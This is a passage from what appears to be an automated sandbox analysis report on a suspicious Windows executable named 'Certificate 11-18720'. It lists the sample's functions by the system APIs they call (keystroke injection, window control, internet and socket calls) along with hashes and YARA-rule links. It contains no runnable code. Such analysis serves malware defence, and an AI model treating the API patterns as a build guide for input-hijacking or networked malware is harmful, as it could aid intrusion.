                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 3877424927-0
                                                                                    • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                    • Instruction ID: 5396fc4785da63412ab1ab2da5cc2328245aadb1091e60798165945b08d136ce
                                                                                    • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                    • Instruction Fuzzy Hash: 795198B0A04286ABDB2C8F7B884D56E7FB5FF40360F248669F8A5972D0D7719F509B40
                                                                                    Function 0062C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(00F26B08,?), ref: 0062C544
                                                                                    • ScreenToClient.USER32(?,00000002), ref: 0062C574
                                                                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0062C5DA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                    • String ID:
                                                                                    • API String ID: 3880355969-0
                                                                                    • Opcode ID: 2f2781a8741a8060f0b399aac86423a7e527a1b91bd4d20d90c34aecd6e87d07
                                                                                    • Instruction ID: a564b793b7c670a69fef4cb12a650a0b09bc3ddc5e58aeb8b5d4c4ad03af8eb0
                                                                                    • Opcode Fuzzy Hash: 2f2781a8741a8060f0b399aac86423a7e527a1b91bd4d20d90c34aecd6e87d07
                                                                                    • Instruction Fuzzy Hash: 78514C75900A15AFCF20DF68D880AEE7BB7EB55720F108659F955AB290D730ED81CF90
                                                                                    Function 005FC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 005FC462
                                                                                    • __itow.LIBCMT ref: 005FC49C
                                                                                      • Part of subcall function 005FC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 005FC753
                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 005FC505
                                                                                    • __itow.LIBCMT ref: 005FC55A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$__itow
                                                                                    • String ID:
                                                                                    • API String ID: 3379773720-0
                                                                                    • Opcode ID: 9945ae7ef482cf882d2ee93d3d58b8cab54bd1ac28ea3ef4a0968598a0e16f3c
                                                                                    • Instruction ID: d6e47ccab0e40f3f20b66271251e4d29e930a3b575a0425a453cbc6e829fe934
                                                                                    • Opcode Fuzzy Hash: 9945ae7ef482cf882d2ee93d3d58b8cab54bd1ac28ea3ef4a0968598a0e16f3c
                                                                                    • Instruction Fuzzy Hash: CA414E71A0060D6FDF15EB94C959FAE7FB9BB85700F000029F645A7181DB74AA458BA1
                                                                                    Function 0060390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00603966
                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00603982
                                                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 006039EF
                                                                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00603A4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: 05947de05e84f817f0dea1ffac9730daef9076d18e8c80080e834f12d8430461
                                                                                    • Instruction ID: ebd477664ee8e60eb01e9c904c9179d4c3926b47f5690fe337ffde2cf79396a2
                                                                                    • Opcode Fuzzy Hash: 05947de05e84f817f0dea1ffac9730daef9076d18e8c80080e834f12d8430461
                                                                                    • Instruction Fuzzy Hash: 0841E570AC42286AEF288B6588097FBBBBB9B55312F04015AE4C1563C1DBB48E859765
                                                                                    Function 0060E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0060E742
                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0060E768
                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0060E78D
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0060E7B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 3321077145-0
                                                                                    • Opcode ID: 93eaa18ece3fa34070fe5a4bf7b96d724c577a4814354f01aaa5989da01659bb
                                                                                    • Instruction ID: a901001d8a8d3913048cb7adde851d281a833a633e35db423727c8aefe915e8b
                                                                                    • Opcode Fuzzy Hash: 93eaa18ece3fa34070fe5a4bf7b96d724c577a4814354f01aaa5989da01659bb
                                                                                    • Instruction Fuzzy Hash: E6413839600651DFCF15EF54C448A4EBBE6BF99710F098899E906AB3A2CB71FD00CB91
                                                                                    Function 0062B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0062B5D1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 634782764-0
                                                                                    • Opcode ID: 4ce21ef6d290ffae97dee9fb06917061a8b8ce9eb3788f45792b381a8aac9fc1
                                                                                    • Instruction ID: 60ed731938c8bc765d504f3e51c6620207278b5b4bd0e67db86deba35d242b0b
                                                                                    • Opcode Fuzzy Hash: 4ce21ef6d290ffae97dee9fb06917061a8b8ce9eb3788f45792b381a8aac9fc1
                                                                                    • Instruction Fuzzy Hash: AD31E034600A25BFEF209F18EC89FE877A7EB06310F646501FA51EA2E1D730A9419F55
                                                                                    Function 0062D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ClientToScreen.USER32(?,?), ref: 0062D807
                                                                                    • GetWindowRect.USER32(?,?), ref: 0062D87D
                                                                                    • PtInRect.USER32(?,?,0062ED5A), ref: 0062D88D
                                                                                    • MessageBeep.USER32(00000000), ref: 0062D8FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1352109105-0
                                                                                    • Opcode ID: 46af32f5c9db6e3814abd13c49a400df8315044c690413d5fb58bde775cfd8b9
                                                                                    • Instruction ID: 9bc27ac8152377f2e4f920a783d63df634315c4272511f772a429da7b257a888
                                                                                    • Opcode Fuzzy Hash: 46af32f5c9db6e3814abd13c49a400df8315044c690413d5fb58bde775cfd8b9
                                                                                    • Instruction Fuzzy Hash: AF418074A00628EFCB15DF58E884BA977F7FB45311F1882A9E8549F290D734E945CF40
                                                                                    Function 00603A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00603AB8
                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00603AD4
                                                                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00603B34
                                                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00603B92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: cda91e812905917b7f4f1065765df2fa945b21d8abad62015a9b0b5e556160e1
                                                                                    • Instruction ID: 93fcf9d3916b833c786fb5018731bd776abe4127d2e2f71a835d196ed1455703
                                                                                    • Opcode Fuzzy Hash: cda91e812905917b7f4f1065765df2fa945b21d8abad62015a9b0b5e556160e1
                                                                                    • Instruction Fuzzy Hash: EA310830A80268AEEF288B64C8197FF7BAF9F6531AF04015AE481933D1CB748F45C765
                                                                                    Function 005F4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005F4038
                                                                                    • __isleadbyte_l.LIBCMT ref: 005F4066
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 005F4094
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 005F40CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                    • String ID:
                                                                                    • API String ID: 3058430110-0
                                                                                    • Opcode ID: 1596618683925379a9705cb63e6e25878e6e56622c8217c88c42d91a522b74b0
                                                                                    • Instruction ID: a7651bbeddfceebb20167c9e287bafdffcfca95e1909570c3cec66d5d43d1799
                                                                                    • Opcode Fuzzy Hash: 1596618683925379a9705cb63e6e25878e6e56622c8217c88c42d91a522b74b0
                                                                                    • Instruction Fuzzy Hash: B631A13160024AEFDB219F65C848B7B7FA9BF41310F158428EB658B191EB35E890DF90
                                                                                    Function 00627CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 00627CB9
                                                                                      • Part of subcall function 00605F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00605F6F
                                                                                      • Part of subcall function 00605F55: GetCurrentThreadId.KERNEL32 ref: 00605F76
                                                                                      • Part of subcall function 00605F55: AttachThreadInput.USER32(00000000,?,0060781F), ref: 00605F7D
                                                                                    • GetCaretPos.USER32(?), ref: 00627CCA
                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00627D03
                                                                                    • GetForegroundWindow.USER32 ref: 00627D09
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                    • String ID:
                                                                                    • API String ID: 2759813231-0
                                                                                    • Opcode ID: e13fbbd5862cc2b298bce2a9290a12b342a8676fad2a35b4d9d5f911cabf375e
                                                                                    • Instruction ID: 63a8dd9482ef43d7206e3b854522613c232c79557265e5f89e8924bccc868519
                                                                                    • Opcode Fuzzy Hash: e13fbbd5862cc2b298bce2a9290a12b342a8676fad2a35b4d9d5f911cabf375e
                                                                                    • Instruction Fuzzy Hash: 1E311E75D00109AFDB10EFA9D8459EFBBF9EF94310B10846BE815E3211DA319E458FA0
                                                                                    Function 0062F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • GetCursorPos.USER32(?), ref: 0062F211
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0063E4C0,?,?,?,?,?), ref: 0062F226
                                                                                    • GetCursorPos.USER32(?), ref: 0062F270
                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0063E4C0,?,?,?), ref: 0062F2A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2864067406-0
                                                                                    • Opcode ID: c8f8a1d75494a0ff6dfd71bb9d148dca9cd151765871b3bdd8f4dc327802fae4
                                                                                    • Instruction ID: 7ef792f4735f1da244b4f066bdfbb221f3f1056e18dbeb959f77320d8de62d03
                                                                                    • Opcode Fuzzy Hash: c8f8a1d75494a0ff6dfd71bb9d148dca9cd151765871b3bdd8f4dc327802fae4
                                                                                    • Instruction Fuzzy Hash: A3219E39601428EFCB258F94E858EEE7BBAEB4B310F148079F9054B2A1D7319A51DF60
                                                                                    Function 0061431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00614358
                                                                                      • Part of subcall function 006143E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00614401
                                                                                      • Part of subcall function 006143E2: InternetCloseHandle.WININET(00000000), ref: 0061449E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1463438336-0
                                                                                    • Opcode ID: c0941f2a6d2ee0a63919183aefff48fa3e721ad45ac3301a2f3b49e566cad4a0
                                                                                    • Instruction ID: 213f1f651aac30c1e3b1ddabe8ae138a1922dc3ec3a49bc04f832716125f34d4
                                                                                    • Opcode Fuzzy Hash: c0941f2a6d2ee0a63919183aefff48fa3e721ad45ac3301a2f3b49e566cad4a0
                                                                                    • Instruction Fuzzy Hash: E021CF35600601BBEB119F619C00FFBB7ABFF88710F08401ABA2597650DB7198A1A790
                                                                                    Function 00618A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00618AE0
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00618AF2
                                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00618AFF
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00618B16
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastacceptselect
                                                                                    • String ID:
                                                                                    • API String ID: 385091864-0
                                                                                    • Opcode ID: 8b6594d23835310d6a99b8c0000b5816e2e1167ccdbafbe9799c4fa0507787f9
                                                                                    • Instruction ID: abbb94f98b64c217fb7b939e316bb9f44aedab48380fc6bb70700a1ae248b0b1
                                                                                    • Opcode Fuzzy Hash: 8b6594d23835310d6a99b8c0000b5816e2e1167ccdbafbe9799c4fa0507787f9
                                                                                    • Instruction Fuzzy Hash: 00218176A00124AFC721DF68D885ADEBBFDEF4A310F04416AF849D7290DB749E818F90
                                                                                    Function 00628A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00628AA6
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00628AC0
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00628ACE
                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00628ADC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                    • String ID:
                                                                                    • API String ID: 2169480361-0
                                                                                    • Opcode ID: 869cb681d790e144939412fd4ed6ce3658cf3e45f02fb83cfe5f56d5b5d14e66
                                                                                    • Instruction ID: 8bc140455a7c18a91fef6063743c63e6f9c689e35c5efd729469ab23713ff673
                                                                                    • Opcode Fuzzy Hash: 869cb681d790e144939412fd4ed6ce3658cf3e45f02fb83cfe5f56d5b5d14e66
                                                                                    • Instruction Fuzzy Hash: 50119335746521AFD704AB58DC09FBA77AABF85320F14411EF916C72E2CF70AC018B94
                                                                                    Function 00600AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00601E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00600ABB,?,?,?,0060187A,00000000,000000EF,00000119,?,?), ref: 00601E77
                                                                                      • Part of subcall function 00601E68: lstrcpyW.KERNEL32(00000000,?,?,00600ABB,?,?,?,0060187A,00000000,000000EF,00000119,?,?,00000000), ref: 00601E9D
                                                                                      • Part of subcall function 00601E68: lstrcmpiW.KERNEL32(00000000,?,00600ABB,?,?,?,0060187A,00000000,000000EF,00000119,?,?), ref: 00601ECE
                                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0060187A,00000000,000000EF,00000119,?,?,00000000), ref: 00600AD4
                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,0060187A,00000000,000000EF,00000119,?,?,00000000), ref: 00600AFA
                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0060187A,00000000,000000EF,00000119,?,?,00000000), ref: 00600B2E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                    • String ID: cdecl
                                                                                    • API String ID: 4031866154-3896280584
                                                                                    • Opcode ID: b95b05970037249d0aeffade86bdf2dbaa79c98d35d1ee68fb9d9b92dd23d64c
                                                                                    • Instruction ID: 6cd822b2c167b72811aafb3259d2312469695da6e5831c94bdb91e5652a41d7d
                                                                                    • Opcode Fuzzy Hash: b95b05970037249d0aeffade86bdf2dbaa79c98d35d1ee68fb9d9b92dd23d64c
                                                                                    • Instruction Fuzzy Hash: BD119A3A100305AFDB25AF24DC45EBB77AAFF45354F80406AE906CB390EB719851C7D0
                                                                                    Function 005F2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 005F2FB5
                                                                                      • Part of subcall function 005E395C: __FF_MSGBANNER.LIBCMT ref: 005E3973
                                                                                      • Part of subcall function 005E395C: __NMSG_WRITE.LIBCMT ref: 005E397A
